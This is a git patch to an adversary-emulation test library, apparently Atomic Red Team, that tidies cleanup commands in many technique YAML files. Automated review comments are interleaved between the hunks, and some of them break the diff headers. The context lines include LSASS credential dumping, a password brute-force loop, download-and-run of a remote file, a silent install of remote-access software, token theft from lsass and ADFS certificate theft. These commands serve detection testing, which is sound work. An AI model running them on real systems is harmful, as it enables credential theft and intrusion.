From 5bb5878e623f90366fb1726ea763952856ac76b9 Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Thu, 9 Dec 2021 11:42:14 -0700
Subject: [PATCH] Cleaning up the Cleanup commands (#1685)

* cleanup fixes
* cleanup fixes
* cleanup fixes
---
 atomics/T1003.001/T1003.001.yaml | 4 ++--
 atomics/T1003.002/T1003.002.yaml | 6 ++----
 atomics/T1040/T1040.yaml | 8 ++++----
 atomics/T1047/T1047.yaml | 2 +-
 atomics/T1059.003/T1059.003.yaml | 2 +-
 atomics/T1069.001/T1069.001.yaml | 2 +-
 atomics/T1098.001/T1098.001.yaml | 12 ++++++++----
 atomics/T1105/T1105.yaml | 2 +-
 atomics/T1110.001/T1110.001.yaml | 4 ++--
 atomics/T1112/T1112.yaml | 2 +-
 atomics/T1119/T1119.yaml | 2 +-
 atomics/T1134.002/T1134.002.yaml | 7 ++-----
 atomics/T1137.002/T1137.002.yaml | 2 +-
 atomics/T1137.004/T1137.004.yaml | 2 +-
 atomics/T1137/T1137.yaml | 4 ++--
 atomics/T1197/T1197.yaml | 2 +-
 atomics/T1204.002/T1204.002.yaml | 2 +-
 atomics/T1219/T1219.yaml | 2 +-
 atomics/T1220/T1220.yaml | 4 ++--
 atomics/T1222.001/T1222.001.yaml | 20 +++++--------------
 atomics/T1484.002/T1484.002.yaml | 6 ++++--
 atomics/T1490/T1490.yaml | 4 ++--
 atomics/T1547.010/T1547.010.yaml | 2 +-
 atomics/T1552.004/T1552.004.yaml | 8 ++++----
 atomics/T1553.004/T1553.004.yaml | 6 +++---
 atomics/T1562.001/T1562.001.yaml | 4 +++-
 26 files changed, 57 insertions(+), 64 deletions(-)

diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index d29dd83d..8f5c91e8 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -369,7 +369,7 @@ atomic_tests:
 $ID = $FIELDS[1]
 & "#{createdump_exe}" -u -f #{output_file} $ID
 cleanup_command: |
- del #{output_file}
+ Remove-Item #{output_file} -ErrorAction Ignore
 name: powershell
 elevation_required: true
 - name: Dump LSASS.exe using imported Microsoft DLLs
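Review bot: `Remove-Item #{output_file} -ErrorAction Ignore` (and the identical form in the @@ -403 hunk) silently tolerates a failed delete of an LSASS memory dump, and a leftover dump is credential material that should not stay on disk unnoticed; consider following it with `if (Test-Path #{output_file}) { Write-Warning "LSASS dump still present: #{output_file}" }`. The path is also unquoted, unlike `"#{createdump_exe}"` two lines above, so a value containing spaces would not be matched and the same silent miss would occur.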
@@ -403,6 +403,6 @@ atomic_tests:
 command: |
 #{xordump_exe} -out #{output_file} -x 0x41
 cleanup_command: |
- Remove-Item ${output_file} -ErrorAction Ignore
+ Remove-Item #{output_file} -ErrorAction Ignore
 name: powershell
 elevation_required: true
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 27c10567..d5325e0b 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -130,9 +130,8 @@ atomic_tests:
 name: powershell
 elevation_required: false
 cleanup_command: |
- write-host ""
 $toremove = #{dump_path} + "\" + '#{dumped_hive}'
- rm $toremove
+ rm $toremove -ErrorAction Ignore
 
 - name: dump volume shadow copy hives with System.IO.File
 auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
@@ -165,6 +164,5 @@ atomic_tests:
 name: powershell
 elevation_required: false
 cleanup_command: |
- write-host ""
 $toremove = #{dump_path} + "\" + '#{dumped_hive}'
- rm $toremove
\ No newline at end of file
+ rm $toremove -ErrorAction Ignore
\ No newline at end of file
diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml
index e965dde8..aca5394a 100644
--- a/atomics/T1040/T1040.yaml
+++ b/atomics/T1040/T1040.yaml
@@ -116,10 +116,10 @@ atomic_tests:
 executor:
 command: netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10
 cleanup_command: |-
- netsh trace stop
- TIMEOUT /T 50
- del %temp%\trace.etl
- del %temp%\trace.cab
+ netsh trace stop >nul 2>&1
+ TIMEOUT /T 5 >nul 2>&1
+ del %temp%\trace.etl >nul 2>&1
+ del %temp%\trace.cab >nul 2>&1
 name: command_prompt
 elevation_required: true
 
diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml
index 127ff171..f8455405 100644
--- a/atomics/T1047/T1047.yaml
+++ b/atomics/T1047/T1047.yaml
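Review bot: `TIMEOUT /T 5 >nul 2>&1` in the T1040 cleanup exits immediately with an error when the cleanup runs with stdin redirected (timeout.exe refuses non-console input, which test harnesses commonly cause), and the new redirection hides that, so the pause before the two `del` lines may never happen; if the pause is really needed, `ping -n 6 127.0.0.1 >nul` is the usual non-interactive substitute. Silencing `del %temp%\trace.etl >nul 2>&1` also means a still-locked trace file is left behind with no indication. The cut from 50 to 5 seconds is presumably deliberate; if `netsh trace stop` finishes writing the .etl/.cab before it returns, the wait could be dropped entirely, which is worth confirming on a real run.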
@@ -148,7 +148,7 @@ atomic_tests:
 Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
 cleanup_command: |
 $CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
- $CleanupClass.Delete()
+ try { $CleanupClass.Delete() } catch {}
 - name: WMI Execute rundll32
 auto_generated_guid: 00738d2a-4651-4d76-adf2-c43a41dfb243
 description: |
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index 1ab5f5a6..db254e43 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
@@ -50,7 +50,7 @@ atomic_tests:
 command: |
 echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
 cleanup_command: |
- del "#{file_contents_path}"
+ del "#{file_contents_path}" >nul 2>&1
 name: command_prompt
 - name: Suspicious Execution via Windows Command Shell
 auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
diff --git a/atomics/T1069.001/T1069.001.yaml b/atomics/T1069.001/T1069.001.yaml
index d259deeb..03b0ac3e 100644
--- a/atomics/T1069.001/T1069.001.yaml
+++ b/atomics/T1069.001/T1069.001.yaml
@@ -76,7 +76,7 @@ atomic_tests:
 New-Item -Path "#{output_path}" -ItemType Directory > $null
 & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}"
 cleanup_command: |
- Remove-Item -Recurse #{output_path}
+ Remove-Item -Recurse #{output_path} -ErrorAction Ignore
 
 - name: Wmic Group Discovery
 auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml
index 1bff621e..1dc75641 100644
--- a/atomics/T1098.001/T1098.001.yaml
+++ b/atomics/T1098.001/T1098.001.yaml
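Review bot: `Remove-Item -Recurse #{output_path} -ErrorAction Ignore` in the T1069.001 hunk leaves the path unquoted while `New-Item -Path "#{output_path}"` two lines above quotes it, so a value with spaces or bracket characters is split or wildcard-expanded and the directory is left behind with the error now hidden. Consider `Remove-Item -Recurse -Force -LiteralPath "#{output_path}" -ErrorAction Ignore`; `-Force` also covers read-only or hidden files in the output directory (whether SharpHound writes any is not visible here), which `-Recurse` alone can fail on.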
@@ -66,10 +66,11 @@ atomic_tests:
 
 Write-Host "End of Hijacking"
 cleanup_command: |
- Import-Module -Name AzureAD
+ try {
+ Import-Module -Name AzureAD -ErrorAction Ignore
 $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
- Connect-AzureAD -Credential $Credential
+ Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
 $credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
 
@@ -80,6 +81,7 @@ atomic_tests:
 }
 Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
 rm "#{path_to_cert}\#{service_principal_name}.pfx"
+ } catch {}
 name: powershell
 elevation_required: false
 
@@ -146,10 +148,11 @@ atomic_tests:
 Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
 Write-Host "End of Hijacking"
 cleanup_command: |
- Import-Module -Name AzureAD
+ try {
+ Import-Module -Name AzureAD -ErrorAction Ignore
 $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
- Connect-AzureAD -Credential $Credential
+ Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 $app = Get-AzureADApplication -Searchstring "#{application_name}"
 $credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
 
@@ -160,6 +163,7 @@ atomic_tests:
 }
 Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
 rm "#{path_to_cert}\#{application_name}.pfx"
+ } catch {}
 name: powershell
 elevation_required: false
 - name: AWS - Create Access Key and Secret Key
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index 6d55d124..f04c2554 100644
--- a/atomics/T1105/T1105.yaml
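Review bot: In the new `try { … } catch {}` around the T1098.001 cleanup (hunks @@ -66 and @@ -80, and the same shape in @@ -146 and @@ -160), the purely local steps — `Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item` and the `rm "#{path_to_cert}\…pfx"` line — come after the Azure AD calls inside the try, so any failure to connect or to look up the service principal/application skips them and the test certificate stays in the user's store and on disk with no message. Moving those two lines into a `finally { }` block, or placing them before the `try {`, keeps the local cleanup unconditional. `-ErrorAction Ignore` on `Connect-AzureAD` affects only non-terminating errors; a sign-in failure is, as far as I can tell, a terminating exception that the catch handles anyway, so the parameter may be redundant there. The middle of each cleanup block falls between the two hunks and is not visible here.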
+++ b/atomics/T1105/T1105.yaml
@@ -438,7 +438,7 @@ atomic_tests:
 cleanup_command: |
 $inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
 $file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
- cmd.exe /c "del $file_to_be_removed"
+ if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }
 name: powershell
 
 - name: Curl Download File
diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml
index 932218dc..f86f8a09 100644
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -33,8 +33,8 @@ atomic_tests:
 echo "Password!" >> #{input_file_passwords}
 @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
 cleanup_command: |-
- del #{input_file_users}
- del #{input_file_passwords}
+ del #{input_file_users} >nul 2>&1
+ del #{input_file_passwords} >nul 2>&1
 - name: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)
 auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
 description: |
diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 3e50709c..beba1b86 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -106,5 +106,5 @@ atomic_tests:
 command: |
 Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
 cleanup_command: |
- Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine
+ try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine -Force } catch {}
 name: powershell
diff --git a/atomics/T1119/T1119.yaml b/atomics/T1119/T1119.yaml
index a2d74e8c..82c9b8e7 100644
--- a/atomics/T1119/T1119.yaml
+++ b/atomics/T1119/T1119.yaml
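Review bot: `if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }` in the T1105 hunk stringifies the `[string[]]` array declared on the line above, so with more than one match the paths are joined into one space-separated string that Remove-Item cannot find, and the ignored error hides the miss; the old `cmd.exe /c "del …"` happened to cope because del accepts several names. Pass the array itself: `if ($file_to_be_removed) { Remove-Item -LiteralPath $file_to_be_removed -ErrorAction Ignore }`. `-LiteralPath` also stops bracket characters in cached file names from being treated as wildcards.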
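Review bot: `try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine -Force } catch {}` in the T1112 hunk swallows the one failure a defender wants to hear about: if the restore fails (not elevated, or the setting is overridden by Group Policy) the machine stays at `Bypass` with no indication. Suggest at least `catch { Write-Warning "Execution policy not restored; LocalMachine scope may still be Bypass: $_" }`. As far as I can tell Set-ExecutionPolicy reports some of these conditions as non-terminating errors, which the catch does not see without `-ErrorAction Stop` inside the try. The cleanup restores the `#{default_execution_policy}` argument rather than the value in effect before the test, which is worth stating in that argument's description.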
@@ -14,7 +14,7 @@ atomic_tests:
 dir c: /b /s .docx | findstr /e .docx
 for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
 cleanup_command: |
- del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
+ del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1
 name: command_prompt
 - name: Automated Collection PowerShell
 auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
diff --git a/atomics/T1134.002/T1134.002.yaml b/atomics/T1134.002/T1134.002.yaml
index f917b80b..fe791031 100644
--- a/atomics/T1134.002/T1134.002.yaml
+++ b/atomics/T1134.002/T1134.002.yaml
@@ -2,7 +2,7 @@ attack_technique: T1134.002
 display_name: "Create Process with Token"
 atomic_tests:
 - name: Access Token Manipulation
- auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e
+ auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e
 description: |
 This Action demonstrates how an access token for a specific program can spawn another program under a different owner.
 Adversaries can leverage access tokens to run programs under a different user not only to achieve privilege escalation but also to evade detection by blending in with normal user activity.
@@ -15,9 +15,6 @@ atomic_tests:
 $owners = @{}
 gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
 Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
- Set-Location $PathToAtomicsFolder
- .\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
- cleanup_command: |
- taskkill /im cmd.exe /f
+ $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
 name: powershell
 elevation_required: true
\ No newline at end of file
diff --git a/atomics/T1137.002/T1137.002.yaml b/atomics/T1137.002/T1137.002.yaml
index 3996acbe..b6f1f5d6 100644
--- a/atomics/T1137.002/T1137.002.yaml
+++ b/atomics/T1137.002/T1137.002.yaml
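Review bot: Dropping the T1134.002 `cleanup_command` (the removed `taskkill /im cmd.exe /f`) leaves the cmd.exe that `[MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")` starts under lsass's token running after the test, with nothing to stop it; the old command was overbroad because it killed every cmd.exe, but a targeted stop is better than none — for instance keep the process id if the helper in GetToken.ps1 returns one (not visible here) and `Stop-Process` it in a restored cleanup_command. Separately, `$PathToAtomicsFolder\T1134.002\src\GetToken.ps1; …` presumably relies on the harness substituting `$PathToAtomicsFolder` textually and on the result containing no spaces; `& "$PathToAtomicsFolder\T1134.002\src\GetToken.ps1"` works in both cases. The @@ -2 hunk is a whitespace-only change.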
@@ -17,5 +17,5 @@ atomic_tests:
 command: |
 reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}"
 cleanup_command: |
- reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1
 name: command_prompt
diff --git a/atomics/T1137.004/T1137.004.yaml b/atomics/T1137.004/T1137.004.yaml
index cb47f610..1fa82435 100644
--- a/atomics/T1137.004/T1137.004.yaml
+++ b/atomics/T1137.004/T1137.004.yaml
@@ -36,4 +36,4 @@ atomic_tests:
 command: |
 reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
 cleanup_command: |
- reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f
+ reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1
diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml
index 238f7a5b..0ba21f5a 100644
--- a/atomics/T1137/T1137.yaml
+++ b/atomics/T1137/T1137.yaml
@@ -17,6 +17,6 @@ atomic_tests:
 mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1
 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
 cleanup_command: |
- reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
- del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f >nul 2>&1
+ del %APPDATA%\Microsoft\Outlook\VbaProject.OTM >nul 2>&1
 name: command_prompt
diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml
index a8011911..2324e24f 100644
--- a/atomics/T1197/T1197.yaml
+++ b/atomics/T1197/T1197.yaml
@@ -114,5 +114,5 @@ atomic_tests:
 command: |
 set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
 cleanup_command: |
- del #{cleanup_path}\#{cleanup_file} >null 2>&1
+ del #{cleanup_path}\#{cleanup_file} >nul 2>&1
 name: command_prompt
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index e111be09..934d8f7e 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -315,7 +315,7 @@ atomic_tests:
 Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
 & "#{pua_file}"
 cleanup_command: |
- Remove-Item #{pua_file}
+ Remove-Item #{pua_file} -ErrorAction Ignore
 - name: Office Generic Payload Download
 auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c
 description: |
diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml
index d6ae2733..fdffafb2 100644
--- a/atomics/T1219/T1219.yaml
+++ b/atomics/T1219/T1219.yaml
@@ -82,7 +82,7 @@ atomic_tests:
 $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
 Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi"
 msiexec /i $installer /qn
- cleanup_command:
+ cleanup_command: |
 $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
 msiexec /x $installer /qn
 name: powershell
diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml
index 1656a3a4..4bfa6f90 100644
--- a/atomics/T1220/T1220.yaml
+++ b/atomics/T1220/T1220.yaml
@@ -49,7 +49,7 @@ atomic_tests:
 command: |
 #{msxsl_exe} #{xmlfile} #{xslfile}
 cleanup_command: |
- Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
+ del #{msxsl_exe} >nul 2>&1
 name: command_prompt
 - name: MSXSL Bypass using remote files
 auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
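Review bot: `msiexec /x $installer /qn` in the T1219 cleanup typically returns before the uninstall completes (PowerShell does not wait for a GUI-subsystem program unless asked), and the downloaded `ScreenConnect.msi` is never removed, so the cleanup's success is unverifiable. Suggest `Start-Process msiexec.exe -ArgumentList "/x `"$installer`" /qn" -Wait` followed by `Remove-Item $installer -ErrorAction Ignore`. The change to `cleanup_command: |` itself is right: without the block indicator the two lines were, as far as I can tell, parsed as one folded plain scalar.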
@@ -85,7 +85,7 @@ atomic_tests:
 command: |
 #{msxsl_exe} #{xmlfile} #{xslfile}
 cleanup_command: |
- Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
+ del -Path #{msxsl_exe} >nul 2>&1
 name: command_prompt
 - name: WMIC bypass using local XSL file
 auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml
index 23ab22af..d8dfe3d5 100644
--- a/atomics/T1222.001/T1222.001.yaml
+++ b/atomics/T1222.001/T1222.001.yaml
@@ -95,28 +95,18 @@ atomic_tests:
 - windows
 input_arguments:
 file_or_folder:
- description: Path of the file or folder remove attribute.
+ description: Path of the files to hide.
 type: Path
 default: '%temp%\T1222.001_attrib_2'
- dependency_executor_name: command_prompt
- dependencies:
- - description: |
- Test requires a file to modify to be located at (#{file_or_folder})
- prereq_command: |
- IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
- get_prereq_command: |
- mkdir #{file_or_folder}
- echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
- echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
 executor:
 command: |
+ mkdir #{file_or_folder} >nul 2>&1
+ echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
+ echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
 attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt
 attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
 cleanup_command: |
- attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt
- attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt
- del #{file_or_folder}\T1222.001_attrib*.txt
- rmdir #{file_or_folder}
+ del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1
 name: command_prompt
 - name: 'Grant Full Access to folder for Everyone - Ryuk Ransomware Style'
 auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
diff --git a/atomics/T1484.002/T1484.002.yaml b/atomics/T1484.002/T1484.002.yaml
index 7c1aeddf..11544e7f 100644
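Review bot: `del -Path #{msxsl_exe} >nul 2>&1` in the second T1220 hunk keeps the PowerShell-style `-Path` token from the replaced Remove-Item line, but the executor is command_prompt, so cmd's del treats `-Path` as a second file name; the real file is still deleted only because del continues past a missing name, and the complaint is hidden by the redirection. Make it match the first hunk: `del #{msxsl_exe} >nul 2>&1`.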
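Review bot: The new T1222.001 cleanup (`del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1`) no longer removes the `#{file_or_folder}` directory that `mkdir #{file_or_folder} >nul 2>&1` in the command now creates, whereas the removed block ended with `rmdir #{file_or_folder}`; add `rmdir #{file_or_folder} >nul 2>&1` after the del. `/A:H` also matches only files that are still hidden, so a run where `attrib.exe +h` failed leaves both text files behind; `del /A #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1` (no attribute list selects all files) removes them regardless. Because the command uses `>>`, repeated runs keep appending to the two files, which is harmless but worth a sentence in the description.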
--- a/atomics/T1484.002/T1484.002.yaml
+++ b/atomics/T1484.002/T1484.002.yaml
@@ -64,11 +64,13 @@ atomic_tests:
 Get-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}"
 Write-Host "End of federation configuration."
 cleanup_command: |
- Import-Module AzureADPreview
+ try {
+ Import-Module AzureADPreview -ErrorAction Ignore
 $PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
- Connect-AzureAD -Credential $Credential > $null
+ Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 Remove-AzureADExternalFederationDomain -ExternalDomainName "#{domain_name}"
+ } catch {}
 name: powershell
 
 
diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index 61510ea3..f117a4da 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -112,6 +112,6 @@ atomic_tests:
 command: |
 schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
 cleanup_command: |
- schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable
- name: powershell
+ schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
+ name: command_prompt
 elevation_required: true
diff --git a/atomics/T1547.010/T1547.010.yaml b/atomics/T1547.010/T1547.010.yaml
index 07f5068d..5de6919d 100644
--- a/atomics/T1547.010/T1547.010.yaml
+++ b/atomics/T1547.010/T1547.010.yaml
@@ -15,6 +15,6 @@ atomic_tests:
 command: |
 reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
 cleanup_command: |
- reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
+ reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1
 name: command_prompt
 elevation_required: true
diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index aadbebc1..f6bac6d6 100644
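Review bot: The new `try { … } catch {}` around the T1484.002 cleanup makes a failed `Remove-AzureADExternalFederationDomain -ExternalDomainName "#{domain_name}"` completely silent, and an external domain federation left configured in the tenant is a persistent sign-in path, not a leftover file; the catch should at least report it, e.g. `catch { Write-Warning "External federation for #{domain_name} was not removed: $_" }`. Since `Connect-AzureAD … -ErrorAction Ignore` suppresses only non-terminating errors, a failed sign-in presumably ends up in this same catch, which is another reason to make it speak. The whole cleanup block is within the hunk.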
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -125,8 +125,8 @@ atomic_tests:
 Get-ChildItem | Where-Object {$_ -like "ADFS*"}
 Write-Host "`nCertificates retrieved successfully"
 cleanup_command: |
- Remove-Item -Path ".\ADFS_encryption.pfx"
- Remove-Item -Path ".\ADFS_signing.pfx"
+ Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
+ Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
 name: powershell
 - name: ADFS token signing and encryption certificates theft - Remote
 auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
@@ -194,6 +194,6 @@ atomic_tests:
 Get-ChildItem | Where-Object {$_ -like "ADFS*"}
 Write-Host "`nCertificates retrieved successfully"
 cleanup_command: |
- Remove-Item -Path ".\ADFS_encryption.pfx"
- Remove-Item -Path ".\ADFS_signing.pfx"
+ Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
+ Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
 name: powershell
diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml
index 48a5984e..115b13a0 100644
--- a/atomics/T1553.004/T1553.004.yaml
+++ b/atomics/T1553.004/T1553.004.yaml
@@ -117,9 +117,7 @@ atomic_tests:
 Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
 Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
 }
- catch {
- Write-Host "Elevation required but not provided" -ForegroundColor Red
- }
+ catch { }
 name: powershell
 elevation_required: true
 - name: Install root CA on Windows with certutil
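Review bot: `catch { }` in the T1553.004 @@ -117 hunk deletes the only message that cleanup produced, and the @@ -147 hunk adds the same silent `try { … } catch { }`; what fails here is removing a CA certificate from `Cert:\LocalMachine\Root`, so a user who ran the test without elevation is left with a test root CA trusted machine-wide and no hint of it. Keep a warning in both catches, e.g. `catch { Write-Warning "Could not remove test CA $($cert.Thumbprint) from LocalMachine\Root (elevation required?): $_" }`. In @@ -147, `Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My` re-installs the certificate just to learn its thumbprint; `(New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 "#{pfx_path}").Thumbprint` reads it without touching the store, assuming the .pfx is not password-protected as the `certutil -addstore` line suggests. The opening `try {` of the first block is above the @@ -117 hunk.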
@@ -147,8 +145,10 @@ atomic_tests:
 command: |
 certutil -addstore my #{pfx_path}
 cleanup_command: |
+ try {
 $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
 Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
 Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+ } catch { }
 name: powershell
 elevation_required: true
diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 93e41207..bb4bd54d 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -519,12 +519,14 @@ atomic_tests:
